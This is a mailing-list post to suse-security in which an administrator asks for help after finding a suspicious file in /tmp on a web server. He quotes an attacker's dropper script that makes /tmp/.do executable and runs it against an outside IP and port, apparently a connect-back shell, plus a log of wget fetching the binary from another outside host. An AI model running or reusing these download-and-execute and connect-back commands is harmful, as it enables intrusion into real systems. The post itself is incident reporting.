[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[suse-security] Backdoor over http(s)??



Hi all,

I have found something under /tmp:

.do
.do.sh -->
----
chmod 755 /tmp/.do
/tmp/.do 163.17.51.8 9090
-----

ls -l shows:
wwwrun nogroup
----

I have found in /var/log/httpd/error.log

--09:06:43--  http://218.234.171.84/manual/.x/rhs
           => `/tmp/.do'
Resolving 218.234.171.84... done.
Connecting to 218.234.171.84:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 435,444 [text/plain]

    0K .......... .......... .......... .......... .......... 11%   44.21 KB/s
   50K .......... .......... .......... .......... .......... 23%  131.93 KB/s
  100K .......... .......... .......... .......... .......... 35%  123.76 KB/s
  150K .......... .......... .......... .......... .......... 47%  153.37 KB/s
  200K .......... .......... .......... .......... .......... 58%  137.36 KB/s
  250K .......... .......... .......... .......... .......... 70%  150.15 KB/s
  300K .......... .......... .......... .......... .......... 82%  373.13 KB/s
  350K .......... .......... .......... .......... .......... 94%  144.09 KB/s
  400K .......... .......... .....                           100%   90.46 KB/s

09:06:47 (115.02 KB/s) - `/tmp/.do' saved [435444/435444]

connect error
-----
What's that?
chkroot shows nothing,
tripwire -"-
???

Gruss
Tibor

-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here